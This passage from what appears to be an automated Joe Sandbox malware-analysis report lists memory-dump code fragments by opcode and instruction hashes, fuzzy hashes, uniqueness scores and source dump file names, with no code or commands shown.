                                                                                                                                                                                • Instruction Fuzzy Hash: 97219060A1C9594FEB45BBAC98627BD77D1FF58780F5406B9E01CC72C3CD2C68058792
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5ba8b45a2f49a763c09866ee1371455646c39b1680773f4e7a23e1f0f800bdd3
                                                                                                                                                                                • Instruction ID: 8386047678bb52a8e50014671b588b25ee258bad256cdc687b1feb9f02456d0a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ba8b45a2f49a763c09866ee1371455646c39b1680773f4e7a23e1f0f800bdd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 1511907061A9199FDF89FB2CC585AB933E1FB98351B401566E40DC32A5CB35AC818B81
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3b535583c2d598cf06d59606013e602296d1def47604e872b8ce7e4a07dd981c
                                                                                                                                                                                • Instruction ID: e988bd0482abdc0fe42ceefab59bc5deb9e4fd42c0386056940d8e2408757401
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b535583c2d598cf06d59606013e602296d1def47604e872b8ce7e4a07dd981c
                                                                                                                                                                                • Instruction Fuzzy Hash: 78118220B1891D5BEB54BBAC98567BE72D1FF48780FA00679E01DC32C3CD2CA8018792
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 52e0caf30ab6b55dc5080c217be9049699fd3de71f1f1c25e74c8dca860cee21
                                                                                                                                                                                • Instruction ID: d4059c7016af5372ef086b2757c1c3aba9b812933fe2d12753d97771112988f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 52e0caf30ab6b55dc5080c217be9049699fd3de71f1f1c25e74c8dca860cee21
                                                                                                                                                                                • Instruction Fuzzy Hash: BC11E132E0895D8FEF44ABB858191FDBBB1FF65641F040577D168D3192DE384908CB95
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a44a96a53c5d211e530cdef3827e950d04cd0f5cfd6c69478e06a1d0c4b57a29
                                                                                                                                                                                • Instruction ID: 9768557224955d00123f340c322ce7b37a227073fefd4ff7cf62218601f31475
                                                                                                                                                                                • Opcode Fuzzy Hash: a44a96a53c5d211e530cdef3827e950d04cd0f5cfd6c69478e06a1d0c4b57a29
                                                                                                                                                                                • Instruction Fuzzy Hash: 0901D110E0C6560FFAA566B858762BC2791FF96780F5006BAD00DCB1D3DF2C6C02DB82
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 86aff0321f550b5936b58d9c61776b8d082774c67b80d493446e79326fec6b80
                                                                                                                                                                                • Instruction ID: 7fc987e631a8613ea8cfbf458b0b5894fdb687de945659a0e9aba122d14fd6bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 86aff0321f550b5936b58d9c61776b8d082774c67b80d493446e79326fec6b80
                                                                                                                                                                                • Instruction Fuzzy Hash: E501269490D7800FEB45AB385811475BFE1EB86291F4806FAE488C31D7DD18A945C346
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5c8a883828ed5e8de4bcbf3e7364a9aed001638d0946ab2f3e5eb6c9692969c8
                                                                                                                                                                                • Instruction ID: 3c563c1d76c8c657b3a08f257fd5b194e458aacd23f40bb077aa35f698a73fdb
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c8a883828ed5e8de4bcbf3e7364a9aed001638d0946ab2f3e5eb6c9692969c8
                                                                                                                                                                                • Instruction Fuzzy Hash: FFF08731E0492D4BEF84ABA898092FEBBF1FB58742F00053BE51DD3295DE385A008BC1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8965c900f8161e636303884aa01630ae0265687af6b01d533d70edb3a1068bc1
                                                                                                                                                                                • Instruction ID: 8ea007238cb1e0f7150f57cacee21b7292f16dd55165edf1f62b96d1677238ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 8965c900f8161e636303884aa01630ae0265687af6b01d533d70edb3a1068bc1
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF0F82284E3C95FD7035B705C255A57F74AE53140B0E42DBE488CB0A3DA186619CB62
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5d893d01b5fe46a42136548ec65ee977cf5668928a305a7b42367b3ee9c7df39
                                                                                                                                                                                • Instruction ID: de3629e99aeda19ccb041d0e09e05c99231c9eecb1f7be722b1fdbbde47f9177
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d893d01b5fe46a42136548ec65ee977cf5668928a305a7b42367b3ee9c7df39
                                                                                                                                                                                • Instruction Fuzzy Hash: 19E0D83190894C9BDB41AA99A8146E97BA0FF89318F0801AAE45CC71C2CB355555C759
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                • Instruction ID: 3dc5e191a2cd0ec93c56f129dc9b6acbc4f0bd4dbcf66413e071a02f663826ae
                                                                                                                                                                                • Opcode Fuzzy Hash: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                • Instruction Fuzzy Hash: E4B09201E6A84A409805327949520BDBB20BB9A260FD40AB0D48D880C7DA5E14968A8A
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%